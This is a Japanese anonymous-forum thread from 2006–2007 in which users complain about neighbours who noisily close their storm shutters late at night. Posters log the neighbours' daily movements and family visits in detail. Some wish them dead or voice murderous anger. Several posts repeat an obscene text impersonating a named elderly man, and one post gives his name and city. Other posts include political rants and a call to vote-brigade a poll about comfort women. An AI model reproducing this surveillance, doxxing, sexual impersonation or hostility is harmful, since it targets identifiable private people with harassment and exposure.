306 :名無しさん@お腹いっぱい。:2006/10/30(月) 19:35:24 ID:5bamur7+
隣のお爺さん、今日は19時22分にご帰宅
これから、不法ブースターでアマチュア無線とADSLインターネットしてから
午後9時にご飯を食べ、嫁が韓国TVをレンタルスカパーで見て
寝るのは午前2時
雨戸は午後11時

乙w

307 :名無しさん@お腹いっぱい。:2006/10/30(月) 19:35:57 ID:5bamur7+
いつも午後5時半にご帰宅なのにねwww

308 :名無しさん@お腹いっぱい。:2006/11/02(木) 23:04:26 ID:g55ouwhx
今から閉めよるぞ
静かにWBSを見ているのに、音をかきけさないでくれ!
隣の糞プレ団塊

309 :名無しさん@お腹いっぱい。:2006/11/03(金) 11:59:47 ID:k98MnITl
昨晩は23時過ぎに閉まり、先ほど開いたw

310 :名無しさん@お腹いっぱい。:2006/11/03(金) 17:30:07 ID:93tA8kY7
今晩は早くしなりそうな予感w

今、一階をドタバタwww

プレ団塊は常識しらずwww

また、「うるさい」と夜中に叫んでみようかと思っている 笑

311 :名無しさん@お腹いっぱい。:2006/11/03(金) 17:30:43 ID:93tA8kY7
ミスタイプ
今晩は早く閉まりそうな予感w

312 :名無しさん@お腹いっぱい。:2006/11/03(金) 18:06:34 ID:7yTVTa1o
二階も全て閉まってます ワロタ
昨晩、クレーム(あまり良い方法ではなかったが)を言って等分安心www

313 :名無しさん@お腹いっぱい。:2006/11/04(土) 20:05:43 ID:vI0BOZHt
今日はまだ閉まってねぇ

314 :名無しさん@お腹いっぱい。:2006/11/05(日) 17:54:03 ID:RikCxbNd
>>305
まったく同感 異常性欲者だな 

315 :名無しさん@お腹いっぱい。:2006/11/10(金) 16:09:10 ID:Ux5ZYkaG
このスレおもしろい

316 :名無しさん@お腹いっぱい。:2006/11/10(金) 21:34:05 ID:ZZxBtUvD
隣関係なく寝ます
おやすみなさい

317 :名無しさん@お腹いっぱい。:2006/11/11(土) 22:42:57 ID:2Mo8cGdf
63歳の H●RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ

K亀公園でテニス 昼間やってます
よろしかったら誘ってください


318 :名無しさん@お腹いっぱい。:2006/11/12(日) 22:00:42 ID:Q5Mp3f9a
アフォな家w

319 :名無しさん@お腹いっぱい。:2006/11/18(土) 16:40:08 ID:CS2njPEI
>>317
あんた 琵琶湖の35万石の城下町に住んでいる人だね
あんたと テニスするのは下品すぎてうんざりしたよ
都会にはあんたみたいな下品な人で
テニスやっている人はいないな
          〜元 Gテニスクラブ員より〜       

320 :名無しさん@お腹いっぱい。:2006/11/18(土) 23:39:48 ID:7ANlWQJr
荒らされかけw
お年よりはププププププ

321 :名無しさん@お腹いっぱい。:2006/11/22(水) 22:44:48 ID:7ncTZNPm
今一斉に閉めています
また、23時前

322 :名無しさん@お腹いっぱい。:2006/11/22(水) 22:45:19 ID:7ncTZNPm
うるせぇ〜

323 :名無しさん@お腹いっぱい。:2006/11/23(木) 21:05:39 ID:uTtkVAMg
>>319
異常性欲者だな
性犯罪予備軍だ




324 :名無しさん@お腹いっぱい。:2006/11/24(金) 23:22:04 ID:if++7YIr
今度はこんな遅い時間から、ドタンバタン戸の音、フライパンの音等
なんじゃぁ隣はww

325 :名無しさん@お腹いっぱい。:2006/11/25(土) 18:28:19 ID:z8/Igt9x
今宵は18:26〜ガンガラ、ドタバタ w
アフォか

326 :名無しさん@お腹いっぱい。:2006/11/25(土) 20:55:48 ID:7P0Zf7XA
>>323
ほんとだ そいつは 基地外

327 :名無しさん@お腹いっぱい。:2006/11/29(水) 19:45:15 ID:2M44GsNL
今晩は今閉まりましたw

328 :名無しさん@お腹いっぱい。:2006/12/01(金) 17:06:21 ID:1isu5MXm
じいさんへ、なぜフラフラするの?

329 :名無しさん@お腹いっぱい。:2006/12/02(土) 22:06:24 ID:hIY9OK6B
今、必死で閉めているなww
家の中冷え切ってから閉める馬鹿wwww

330 :名無しさん@お腹いっぱい。:2006/12/03(日) 20:45:32 ID:z0v9B35K
>>326
そいつは 初老ど基地外 で有名


331 :名無しさん@お腹いっぱい。:2006/12/05(火) 22:59:28 ID:eqaKvDyT
22:55閉まり

332 :名無しさん@お腹いっぱい。:2006/12/06(水) 23:22:14 ID:Lg+I90EG
23:07閉まり

333 :317<319、全共闘世代は雨戸を閉めない:2006/12/07(木) 00:24:10 ID:rr0xESYD
http://zenkyoto68.hp.infoseek.co.jp/CourtneyWhitney1.htm
ホイットニー文書。
天皇ヒロヒトのこの言い草には唖然、呆然とするしかない。

それにしても、何という言い草か。
自国民310万人の命を奪い、2000万人以上に上るアジアの人たちを殺した侵略戦争の
最高責任者としての自覚がないばかりか、戦後に至って尚国民を売り渡し、
形振りかまわぬ自己保身に終始している余りにもおぞましい姿がこの文書から読み取れる。
このような男の影響下にあった者たちが、いまもあの戦争を侵略戦争ではないと言い張り、
侵略殺人を正当化する暴言を吐き続けている破廉恥行為は当然と言えばいえる。
家族を殺された者にとっては遣り切れない、許し難いことである。
http://members.at.infoseek.co.jp/YaYa/isihara.htm
http://www.jcp.or.jp/akahata/aik2/2003-10-31/03_01.html


334 :名無しさん@お腹いっぱい。:2006/12/08(金) 22:18:17 ID:aSpa9/Oz
今晩は22時で、インターネットをやめて一階でプラズマTVを見ているようです
昨年買ったそうです

今はもっと安いよw


でも、こに地域未だにアナログ電波しか受信できませんけど

335 :名無しさん@お腹いっぱい。:2006/12/08(金) 23:30:11 ID:yc+RR4AD
今晩は23時20分に閉まりました
ついでに、「うるさいな、はよ閉めぇ、常識をかいているのか」
と申してあげましたw

336 :名無しさん@お腹いっぱい。:2006/12/09(土) 23:58:39 ID:hUQT/GIT
19時前に閉まりました^^
クレーム完了
もう二度と言わない

337 :1:2006/12/14(木) 00:34:50 ID:IhX4GmuR
とりあえず終了

338 :名無しさん@お腹いっぱい。:2006/12/16(土) 17:32:14 ID:Pavxtmav
雨戸を早く閉めて しっぽりと やりまくりたいですわ
50代の女性までOKです
63歳の H●RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ

K亀公園でテニス 昼間やってます
よろしかったら誘ってください


339 ::2006/12/16(土) 21:23:43 ID:N+clWS+W
今、一階が閉まったなw
やはりね
また、遅くなったな

340 :1:2006/12/17(日) 17:51:56 ID:G1xGTsVZ
今日も早く閉まった
クレームを言った価値があった
良識あるお隣と判断した

341 :名無しさん@お腹いっぱい。:2006/12/20(水) 23:36:51 ID:aP6YtNhS
と思ったら、今閉まった
もう一度クレームを言われたいのだろうか?


342 :名無しさん@お腹いっぱい。:2006/12/23(土) 20:48:57 ID:hBdTGQaj
糞爺 糞婆

343 :名無しさん@お腹いっぱい。:2006/12/24(日) 00:17:41 ID:jFH3dzhb
今晩は23時20分に閉まりw

344 :名無しさん@お腹いっぱい。:2006/12/24(日) 17:12:46 ID:qh9uY6rY
今日の隣

午前11時頃に起きて雨戸をあけ、いつもの買い物に車ででかけた
一旦午後3時頃に帰って、またでかけた
雨戸は開けたまま
そして、今夜も23時以降に閉まると予測
さて、何時に帰ってきよるかなwww
これは苦情を言ったお礼参りかw

345 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:24:48 ID:23cFhIcy
雨戸を早く閉めて しっぽりと やりまくりたいですわ
50代の女性までOKです
63歳の H●RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ

K亀公園でテニス 昼間やってます
よろしかったら誘ってください



346 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:47:13 ID:5HBiBhzG
今晩はまだ閉まっていない
午後6時に帰ってきた爺
7時30分まで二階で電灯つけていつものお遊びw

そのまま雨戸も閉めずに一階でご飯

嫁は午後5時半に帰宅

さて、今晩は何時に閉まるかな?
今日もハングルドラマはあるのかな?
あいつら日本語しかしらないようだがw

347 :名無しさん@お腹いっぱい。:2006/12/31(日) 10:47:28 ID:hXR1iM3N
昨晩は0時17分に閉まり
深夜3時までテレビの音
うるせぇ

348 :名無しさん@お腹いっぱい。:2007/01/01(月) 17:25:38 ID:wK2/PXTy
今朝はこちらの方だけ開けなかった

いつもいない娘、息子が帰省している

ワロタ

嫌がらせをしているを娘たちに知られたくなさそうだw

349 :名無しさん@お腹いっぱい。:2007/01/02(火) 21:37:58 ID:qIoavP0m
今宵は21時に一階に階すべて閉まったw
神奈川から娘夫婦が来ているな
長男は結婚して別居しているが未だに小梨

どうでもいいが、早く閉まった理由が知りたいがw

350 :名無しさん@お腹いっぱい。:2007/01/04(木) 19:15:30 ID:XZLSWfws
あけまして はめでとうございます
雨戸を早く閉めて しっぽりと やりまくりたいですわ
50代の女性までOKです
63歳の H●RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ

K亀公園でテニス 昼間やってます
よろしかったら誘ってください


351 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:55:41 ID:qrDiMLec
ワロタ

今日は隣の爺さん出勤w

352 :名無しさん@お腹いっぱい。:2007/01/05(金) 21:03:22 ID:FMt+whea
ガキどもは帰ったようだ
明日からまた休み
さて何時に閉まるかな?www

353 :名無しさん@お腹いっぱい。:2007/01/07(日) 01:14:36 ID:FQK6L1u4
今閉めやがったw

死ね

354 :名無しさん@お腹いっぱい。:2007/01/07(日) 01:22:12 ID:yZ0ucf6d
もう一度苦情を言ってやるぞw

355 :名無しさん@お腹いっぱい。:2007/01/07(日) 14:22:33 ID:JP9hF461
今、開けよったぞwww

ひっどい開け方w

356 :名無しさん@お腹いっぱい。:2007/01/10(水) 23:21:47 ID:p6Dj3Gnb
今宵は、一階23:10 二階23:12
連続がんがらがっしゃ〜〜〜〜んw

一階のビエラでなんかドラマでも見ていたのかな?

暑い寒い関係なく、また猛吹雪でも深夜に閉める隣

357 :名無しさん@お腹いっぱい。:2007/01/13(土) 23:59:38 ID:5b83C19q
今宵も23時10分から、がんがらがっしゃ〜〜〜〜んw

358 :名無しさん@お腹いっぱい。:2007/01/21(日) 16:04:57 ID:Rt0Vc9/M
今のところ閉まりが早いですw

359 :名無しさん@お腹いっぱい。:2007/01/24(水) 21:13:09 ID:Zd3wQhaa
18:18に閉まったw

360 :名無しさん@お腹いっぱい。:2007/01/27(土) 11:34:47 ID:WEOMShSv
昨晩23:23閉まり

361 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:23:05 ID:Q5e0LQCQ
今日は先ほど、0時12分から、全室豪快にしまった

そろそろ、文句を言ってやるwwwww

362 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:23:51 ID:Q5e0LQCQ
約10日間だけ早かった

363 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:34:25 ID:Q5e0LQCQ
今度23時以降に閉める音を録音してうpしてみるwwwww

364 :名無しさん@お腹いっぱい。:2007/01/28(日) 01:21:55 ID:+JjDf8VF
お前ら暇だな

365 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:23:09 ID:QGWkOgpm
爺婆は他人に迷惑をかけていても、なんとも思わない
また、他人に注意されても動じない

366 :名無しさん@お腹いっぱい。:2007/01/28(日) 17:37:58 ID:EffZ0uDt
捻くれ爺だなw

367 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:06:08 ID:kYI/G3UW
早く閉まったのは1月21日〜1月26日の間だけ
今晩もまだ閉まらずw

368 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:32:53 ID:PSPBXhvq
録音スタンバイOK

369 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:34:09 ID:jx7D77lj
ハメましておめでとうございます
雨戸を早く閉めて しっぽりと やりまくりたいですわ
50代の女性までOKです
63歳の H●RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ

K亀公園でテニス 昼間やってます


370 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:33:56 ID:bYno6wlX
なんだ、今宵は22:26に全室閉まった
それでも、遅いなw

371 :名無しさん@お腹いっぱい。:2007/01/29(月) 02:02:04 ID:xeFNoXOL
寝たみたいだなw

372 :名無しさん@お腹いっぱい。:2007/01/29(月) 17:09:16 ID:uWZU2C0E
お隣の婆、今バスでお帰りw

373 :名無しさん@お腹いっぱい。:2007/01/29(月) 20:10:13 ID:6Uvz80ij
爺、今日は19時ご帰宅
いつも18時前には帰っているのにね

あれれ?深夜遅く起きて職場で寝ていたのかな?w

374 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:33:27 ID:VHbT/hbA
22;12閉まり

375 :名無しさん@お腹いっぱい。:2007/02/06(火) 18:26:06 ID:5XbHSmgt
今、帰ってきよったぞw

376 :名無しさん@お腹いっぱい。:2007/02/11(日) 16:30:22 ID:17gPGTnE
ミイラどもキショイんだよ
死ねよジジー

377 :名無しさん@お腹いっぱい。:2007/02/12(月) 18:52:08 ID:P0WHf/rl
久しぶりのウォチ 今日は先ほど全部閉まったw

378 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:33:26 ID:Z7PXi1g1
ハメまして 2月です
雨戸を早く閉めて しっぽりと やりまくりたいですわ
50代の女性までOKです
63歳の H●RA 時雄 です
プロは遠慮しますわ なんせ初体験も24歳の時
城崎の温泉街で 暗闇で どうみても50のおばはんやったし
味気ないもんでしたわ あれがトラウマになってます
素人がいいんやで よおーっ
メカ音痴なんで 携帯の優良サイト教えてください
63でも 会ってやれるサイト教えてください
何度も言いますが 女房とは20年ぐらいHなし
キスもさせてもらえません
当然 わたしのチンは役立たず
なんとか したいんや 勃起したいんや 射精したいんや  よーっ
わんわんぽちとやってもええで
K亀公園でテニス 昼間やってます



379 :名無しさん@お腹いっぱい。:2007/02/15(木) 17:53:08 ID:YPH1gKPz
隣の爺、トトロかペンギンに似ているw
まさしく、となりのトトロ

380 :名無しさん@お腹いっぱい。:2007/02/27(火) 23:57:03 ID:XEmUzcKr
age

381 :名無しさん@お腹いっぱい。:2007/03/03(土) 18:05:29 ID:cGgnSTOk
昨晩は22時50分だったなw

382 :名無しさん@お腹いっぱい。:2007/03/06(火) 18:26:31 ID:/zZWqWE+
今、婆が帰ってきて、がんがら一階を閉めているw

383 :名無しさん@お腹いっぱい。:2007/03/06(火) 22:10:40 ID:6H7oEsJV
電動シャッターしめるよ
物騒だからね

384 :名無しさん@お腹いっぱい。:2007/03/09(金) 14:24:50 ID:mU8b8eIu
昨晩は22時55分に閉まった
また、遅くなってきたなw

23時以降ならクレーム言ってやるぞwww

385 :名無しさん@お腹いっぱい。:2007/03/11(日) 00:08:02 ID:QmynC5y1
一階、今閉めよったな
婆やな TVみておったようだなw

386 :ぱとりおっと:2007/03/11(日) 00:51:17 ID:RlukLxnY
378 滋賀県彦根市の原時雄さんですね。いい加減にしなさいw

387 :名無しさん@お腹いっぱい。:2007/03/17(土) 20:18:00 ID:VwYc1D7m
Japanese insist that Comfort women were just prostitutes doing legally permitted business,
employed by commercial brothels. Do you agree with Japanese's notion for the comfort women
as prostitutes than sex slaves?
(慰安婦は商業的売春宿に雇われ公的な許可を得て営業していた、ただの売春婦だと日本は主張し
ています。あなたは慰安婦は性奴隷というより売春婦だったという日本の考えに賛成しますか?)

http://koreascope.com/gnuboard/bbs_en/board.php?bo_table=bbs_event&wr_id=6

性奴隷ではなく 売春婦だった という主張に同意するか という質問だからYES に投票してね 。

388 :名無しさん@お腹いっぱい。:2007/03/19(月) 17:55:03 ID:CF7OEAY1
今日は爺婆とも今帰ってきたな

さて、何時?

389 :名無しさん@お腹いっぱい。:2007/03/19(月) 18:50:49 ID:WZ3fTND4
今、なんか「がんがら、がっしゃ〜〜ん」やっとるぞw

390 :名無しさん@お腹いっぱい。:2007/03/23(金) 04:44:05 ID:VTUWNGlw
雨戸の開け閉めで、殺意涌くのは俺だけか?
雨戸の枚数が多し、頭の上でやられると、マジで殺意涌く。

71 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)